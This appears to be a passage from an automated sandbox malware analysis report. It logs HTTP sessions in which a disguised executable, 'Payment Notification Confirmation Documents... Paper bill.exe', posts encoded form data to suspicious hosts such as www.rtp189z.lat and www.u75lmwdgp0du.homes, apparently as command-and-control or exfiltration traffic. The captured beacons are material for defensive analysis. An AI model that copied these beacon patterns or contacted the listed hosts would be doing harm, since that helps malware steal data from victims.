                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 57 70 6a 66 55 46 6c 45 38 57 59 62 74 4f 48 4c 72 2f 34 35 2b 30 4c 70 39 6b 6d 56 63 72 4c 6e 79 51 47 66 72 4c 46 72 68 43 59 39 4b 55 65 37 5a 31 56 59 46 51 6a 4c 42 50 77 68 53 38 64 6b 4f 57 77 76 41 39 70 54 63 68 67 36 37 68 4f 38 30 47 32 67 41 4e 4e 55 68 41 67 67 75 2f 55 57 71 72 35 79 58 4d 54 44 2b 78 52 47 49 2f 51 32 47 35 36 52 66 65 38 65 31 68 43 4e 77 50 6f 56 51 64 31 43 57 7a 6c 4c 6c 63 6b 65 63 30 2b 66 71 76 4f 50 75 54 44 38 35 74 48 70 76 66 63 76 61 66 79 42 54 4c 63 52 58 57 67 4c 32 7a 33 57 2b 4f 6f 2b 35 72 72 66 32 67 4b 4d 35 76 71 4f 6e 2f 43 4e 70 45 4c 43 58 46 45 3d
                                                                            Data Ascii: idTDev6P=5jf2zjfdd87cWpjfUFlE8WYbtOHLr/45+0Lp9kmVcrLnyQGfrLFrhCY9KUe7Z1VYFQjLBPwhS8dkOWwvA9pTchg67hO80G2gANNUhAggu/UWqr5yXMTD+xRGI/Q2G56Rfe8e1hCNwPoVQd1CWzlLlckec0+fqvOPuTD85tHpvfcvafyBTLcRXWgL2z3W+Oo+5rrf2gKM5vqOn/CNpELCXFE=
                                                                            Jan 13, 2025 10:22:21.584534883 CET1236INHTTP/1.1 404 Not Found
                                                                            keep-alive: timeout=5, max=100
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Mon, 13 Jan 2025 09:22:21 GMT
                                                                            server: LiteSpeed
                                                                            x-turbo-charged-by: LiteSpeed
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                                            Jan 13, 2025 10:22:21.584578991 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                            Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.2.45004368.65.122.71802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:22:23.389830112 CET10831OUTPOST /csd1/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.rtp189z.lat
                                                                            Origin: http://www.rtp189z.lat
                                                                            Referer: http://www.rtp189z.lat/csd1/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 57 70 6a 66 55 46 6c 45 38 57 59 62 74 4f 48 4c 72 2f 34 35 2b 30 4c 70 39 6b 6d 56 63 72 44 6e 7a 69 4f 66 74 59 64 72 67 43 59 39 56 6b 65 36 5a 31 56 42 46 51 4c 50 42 50 39 44 53 35 5a 6b 4f 31 34 76 49 73 70 54 56 68 67 36 30 42 4f 35 70 57 33 39 41 4e 64 51 68 41 77 67 75 2f 55 57 71 6f 68 79 65 2b 37 44 34 78 52 46 50 2f 51 79 43 35 37 45 66 65 6b 4f 31 68 58 77 77 37 63 56 52 39 6c 43 58 46 52 4c 6e 38 6b 6d 5a 30 2b 35 71 76 7a 58 75 54 65 4e 35 75 61 38 76 59 73 76 59 71 44 59 44 50 59 78 4b 31 59 6f 6a 30 58 72 34 35 38 75 39 73 76 4c 36 43 47 32 6e 73 72 74 38 76 66 76 79 48 4b 44 4a 77 61 59 45 46 59 37 65 67 76 47 58 45 36 33 4c 6b 68 70 2f 4a 4f 79 6a 6d 77 75 48 44 70 70 38 57 39 63 47 30 48 37 77 74 59 52 39 4f 54 62 51 7a 2f 4d 53 4b 2b 65 4f 31 73 2f 58 53 39 74 54 45 6d 6c 64 53 33 42 46 58 62 52 6a 56 79 72 64 72 59 77 63 37 46 50 5a 70 6e 4b 58 49 47 6e 35 47 50 2f 30 6f 66 59 2f 56 4e 61 69 53 48 39 43 31 37 34 75 [TRUNCATED]
                                                                            Data Ascii: idTDev6P=5jf2zjfdd87cWpjfUFlE8WYbtOHLr/45+0Lp9kmVcrDnziOftYdrgCY9Vke6Z1VBFQLPBP9DS5ZkO14vIspTVhg60BO5pW39ANdQhAwgu/UWqohye+7D4xRFP/QyC57EfekO1hXww7cVR9lCXFRLn8kmZ0+5qvzXuTeN5ua8vYsvYqDYDPYxK1Yoj0Xr458u9svL6CG2nsrt8vfvyHKDJwaYEFY7egvGXE63Lkhp/JOyjmwuHDpp8W9cG0H7wtYR9OTbQz/MSK+eO1s/XS9tTEmldS3BFXbRjVyrdrYwc7FPZpnKXIGn5GP/0ofY/VNaiSH9C174u7dtpp4qJR+g01HHHFxy5SjxwT1g7OKF5YZVcQ0ptZLL2mv1p+lqXR6HdPsWhM+HZWQoB8smXq0DC9E3CNo+Z+T5Iu5J7fsk/mg+3Te7BbpJP8Fqi6+/DnthrPXj3/rdGqqOKr6SwIbQInm1ieaj2P38SJr5BHEW3hLMGAxZEOI5zddAwjFSXvoEbVCKRYtxKrwKm3o0cYJfCkV6gG8WE59GLcBq4AZddqUEn2PyKkUbrL3cziAbOgwjhZF7NX5o7UP+UZRqTf2RBv7vUhelSUMNZOTlff1tyf7quF/A7HVujG3JV1w/Q5ds0o6Bo3ZEEs2YbvvZA1zX/t7OVk6ltrDeo7aHNLAFnZK7uiHFyMpEQjaX4Fk7gPKRVXuaosEEvk0MNxVV767FP9vA2jfwJYDQPgVWgJoXN21s3j+cBSIhrC4K1FUPUeYSTBxluqd7MsAUrPbScpf/8BI/zWLEMscajGozO3hPj5p2hfSJmMfmAHj+leF6vADPYgTowu33cE9lhfmDewE+RRyrUggGDCHiWkQSsezMjPMfaf8BaAp9DMHZ8c6plNmcGTEw7ei8Fkii93mX+HNM0ZeJor4tWNkRkqyp4Fboxy3+gEdwKVj1cXovVtVTZB3AoUk6TSvcQIKK4TnPC3D5KK7fu7Mt/FJMQ58AF6DYr4h [TRUNCATED]
                                                                            Jan 13, 2025 10:22:24.168641090 CET1236INHTTP/1.1 404 Not Found
                                                                            keep-alive: timeout=5, max=100
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Mon, 13 Jan 2025 09:22:24 GMT
                                                                            server: LiteSpeed
                                                                            x-turbo-charged-by: LiteSpeed
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                                            Jan 13, 2025 10:22:24.168668032 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                            Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            40192.168.2.45004468.65.122.71802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:22:26.412976980 CET465OUTGET /csd1/?z2=LHT8eHbp3J&idTDev6P=0h3WwWevRNaqBPz/dW1li3QIq8Phv/5H4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57VjJjxQ++03TYD8RIhl0tg+o7+6xEQ/Px7iI= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.rtp189z.lat
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:22:27.222404957 CET1236INHTTP/1.1 404 Not Found
                                                                            keep-alive: timeout=5, max=100
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Mon, 13 Jan 2025 09:22:27 GMT
                                                                            server: LiteSpeed
                                                                            x-turbo-charged-by: LiteSpeed
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                                            Jan 13, 2025 10:22:27.222455978 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                            Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            41192.168.2.450045103.174.136.137802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:22:50.300527096 CET750OUTPOST /8m3y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.u75lmwdgp0du.homes
                                                                            Origin: http://www.u75lmwdgp0du.homes
                                                                            Referer: http://www.u75lmwdgp0du.homes/8m3y/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 7a 5a 56 44 71 67 42 7a 4f 33 51 58 55 45 45 69 71 77 55 67 4e 59 32 46 5a 79 43 4d 70 68 62 42 4d 63 46 34 6f 5a 76 6f 6a 71 6c 59 69 73 4d 37 75 48 56 43 51 67 72 45 43 45 42 58 52 64 37 44 4f 53 32 2f 48 6d 45 30 7a 4b 47 58 31 61 36 78 72 45 43 68 4d 33 58 62 4a 79 72 37 52 38 6b 47 78 76 49 43 44 67 78 36 42 59 73 71 57 6b 6d 4f 6f 69 54 57 78 2b 4d 64 70 47 2f 42 57 6a 74 63 38 63 4c 4c 47 2b 45 31 47 4a 64 39 62 51 76 44 5a 47 77 42 4c 6e 68 7a 78 6a 59 73 70 59 6d 31 6f 71 35 74 72 79 42 4a 62 41 48 48 32 33 6a 46 50 6c 4f 44 74 71 4e 61 6d 63 70 37 55 56 4a 38 75 41 3d 3d
                                                                            Data Ascii: idTDev6P=zZVDqgBzO3QXUEEiqwUgNY2FZyCMphbBMcF4oZvojqlYisM7uHVCQgrECEBXRd7DOS2/HmE0zKGX1a6xrEChM3XbJyr7R8kGxvICDgx6BYsqWkmOoiTWx+MdpG/BWjtc8cLLG+E1GJd9bQvDZGwBLnhzxjYspYm1oq5tryBJbAHH23jFPlODtqNamcp7UVJ8uA==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            42192.168.2.450046103.174.136.137802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:22:52.839616060 CET770OUTPOST /8m3y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.u75lmwdgp0du.homes
                                                                            Origin: http://www.u75lmwdgp0du.homes
                                                                            Referer: http://www.u75lmwdgp0du.homes/8m3y/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 7a 5a 56 44 71 67 42 7a 4f 33 51 58 47 30 30 69 6f 54 73 67 4b 34 32 47 48 43 43 4d 77 78 62 4e 4d 63 42 34 6f 59 72 34 6a 59 42 59 68 4f 6b 37 76 46 78 43 52 67 72 45 52 45 42 53 56 64 37 49 4f 53 36 33 48 69 59 30 7a 4b 53 58 31 65 32 78 72 33 36 69 65 58 58 5a 58 53 72 39 66 63 6b 47 78 76 49 43 44 67 4e 63 42 59 55 71 57 31 57 4f 71 44 54 52 39 65 4d 63 35 32 2f 42 53 6a 74 59 38 63 4c 70 47 36 64 61 47 50 52 39 62 56 54 44 5a 55 49 41 43 6e 68 78 76 54 5a 36 76 4c 66 39 6e 37 45 6a 6c 6b 42 62 55 44 76 54 2b 52 75 66 65 55 76 55 2f 71 70 70 37 62 67 50 5a 57 30 31 31 4a 67 6b 2b 68 64 79 32 30 43 74 31 76 59 46 2b 51 6c 64 39 43 63 3d
                                                                            Data Ascii: idTDev6P=zZVDqgBzO3QXG00ioTsgK42GHCCMwxbNMcB4oYr4jYBYhOk7vFxCRgrEREBSVd7IOS63HiY0zKSX1e2xr36ieXXZXSr9fckGxvICDgNcBYUqW1WOqDTR9eMc52/BSjtY8cLpG6daGPR9bVTDZUIACnhxvTZ6vLf9n7EjlkBbUDvT+RufeUvU/qpp7bgPZW011Jgk+hdy20Ct1vYF+Qld9Cc=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            43192.168.2.450047103.174.136.137802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:22:55.391376019 CET4944OUTPOST /8m3y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.u75lmwdgp0du.homes
                                                                            Origin: http://www.u75lmwdgp0du.homes
                                                                            Referer: http://www.u75lmwdgp0du.homes/8m3y/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 7a 5a 56 44 71 67 42 7a 4f 33 51 58 47 30 30 69 6f 54 73 67 4b 34 32 47 48 43 43 4d 77 78 62 4e 4d 63 42 34 6f 59 72 34 6a 59 4a 59 68 2f 45 37 75 6c 4e 43 53 67 72 45 4b 6b 42 54 56 64 37 5a 4f 54 53 4e 48 6c 51 43 7a 4d 57 58 30 37 71 78 74 47 36 69 48 6e 58 5a 4e 79 72 34 52 38 6b 54 78 76 59 47 44 67 39 63 42 59 55 71 57 33 4f 4f 6b 43 54 52 37 65 4d 64 70 47 2f 4e 57 6a 73 2f 38 63 7a 54 47 36 49 6c 47 66 78 39 62 31 6a 44 62 6e 77 41 4e 6e 68 2f 75 54 5a 79 76 4b 6a 79 6e 36 6f 5a 6c 6b 64 31 55 41 7a 54 38 31 62 68 4e 57 37 50 38 35 68 6e 72 49 45 62 51 6e 6b 6c 32 59 73 6d 39 7a 42 4f 31 6e 79 52 33 63 77 4c 71 6c 6c 32 73 79 35 75 30 6e 31 44 33 75 58 48 6c 31 4f 4d 68 2b 35 73 55 57 64 67 2f 7a 47 74 4b 69 44 44 53 44 79 56 2b 34 73 37 4f 42 64 48 6c 54 48 36 4a 74 38 56 64 2f 67 37 36 49 7a 6d 72 45 64 6b 79 2b 61 77 4a 44 6d 68 48 66 49 58 61 64 2b 65 33 6e 79 6c 64 72 71 59 48 6d 7a 58 77 79 51 4c 41 75 2f 63 2b 49 47 2b 5a 55 67 6d 72 45 6a 52 65 56 6d 36 53 [TRUNCATED]
                                                                            Data Ascii: idTDev6P=zZVDqgBzO3QXG00ioTsgK42GHCCMwxbNMcB4oYr4jYJYh/E7ulNCSgrEKkBTVd7ZOTSNHlQCzMWX07qxtG6iHnXZNyr4R8kTxvYGDg9cBYUqW3OOkCTR7eMdpG/NWjs/8czTG6IlGfx9b1jDbnwANnh/uTZyvKjyn6oZlkd1UAzT81bhNW7P85hnrIEbQnkl2Ysm9zBO1nyR3cwLqll2sy5u0n1D3uXHl1OMh+5sUWdg/zGtKiDDSDyV+4s7OBdHlTH6Jt8Vd/g76IzmrEdky+awJDmhHfIXad+e3nyldrqYHmzXwyQLAu/c+IG+ZUgmrEjReVm6S9YTnK88UtCOy6MHUXxS0fxiYR3zPEBvGjZ78f1Wx1Dj4vD26Iia13Er3r8D69VLreHiA+6YHGIR7ud7LKRQlkqQVBDwMugQ7OFoRtXuIKnRrxxdwATTVbWRXRSdKPC+GVbqKs+EaurURTxBpyUq6AhtV8aObb1cXqRdrgExPsetvTiNphuEcdsB//WPqoqRA41hu7tGWsT0ZWHgkbPwnclWLa+jLlmfVMMps1woRMFYkV9rViEEg0M43EZKvHTU+racFsTwQrHysI/r7Cd2MJwMSzgNodfZzNzIjdfWCYwoafoCc6UQh6ibvRADt/BeSrUyLPrkbPaz/ayl1W6cVbKYYbJomdP4M4JLBRn9hnSXTnjpall0uPQLkY5wUPjM301wqaShEof7pOwyerhqeYIq+4Yyis8Cj6QUYrgkpjXPOWRhoQ8bwutGJjq5xIymV2UlvevDB4dhhsvljdGQ/cv/p+Q5X9JXDhf48IVGQYZ9/BZnJfTxjkL8ddLSk5/sFRQoucjsNQqcNgKpp/4sNb9ExCBtddv6SWK9XFm0RstyCHQXq5SUcm/nZw0FR5LEObWS4d6OgzwirJOUxjP93GSX2A3BkhoMlJKhola3SyvnySBQd6v+nWqbU3hL/XF6UNaTerInHy6/1tR8TJHHEYbtpMsOxyDNRIh [TRUNCATED]
                                                                            Jan 13, 2025 10:22:55.391396999 CET5908OUTData Raw: 4a 35 76 52 61 4f 31 46 72 4a 50 5a 50 66 53 30 51 68 48 56 72 4f 42 41 41 31 52 68 6e 32 5a 7a 5a 4c 6b 77 73 7a 58 46 76 63 51 4b 78 34 49 53 36 56 53 63 64 69 48 70 63 5a 7a 36 53 4a 2f 39 4f 54 79 4a 59 50 70 37 6a 78 65 37 36 6e 44 63 45 61
                                                                            Data Ascii: J5vRaO1FrJPZPfS0QhHVrOBAA1Rhn2ZzZLkwszXFvcQKx4IS6VScdiHpcZz6SJ/9OTyJYPp7jxe76nDcEat3BCebG+xW+M5u7cFqKU9s71pRvrPkYYnx1Wgns+9bJENpZB4VIZ+V2OOhO8j3TX+qaQPAM+3Llgr2gG3NQ2fJDpJlA3dvALC/xtyJPfM6RAdbDRD2R5PEn1UAtp60PDGpDtK8yqxFG76ixbRLQXsMBUe+nBfdJWO


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            44192.168.2.450048103.174.136.137802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:22:57.930140018 CET472OUTGET /8m3y/?idTDev6P=+b9jpUpgOBw1R1sbmQNUSLWfWziv1WHHOphGnZ74l6djh+VypXV/SxbEO3x3Zf/CAjSFfUkl5YWJ6O7zhki1CEr+PCryGvo+//4gSAtBEtsQDlqalgX6+sA=&z2=LHT8eHbp3J HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.u75lmwdgp0du.homes
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:04:18:51
                                                                            Start date:13/01/2025
                                                                            Path:C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"
                                                                            Imagebase:0x8e0000
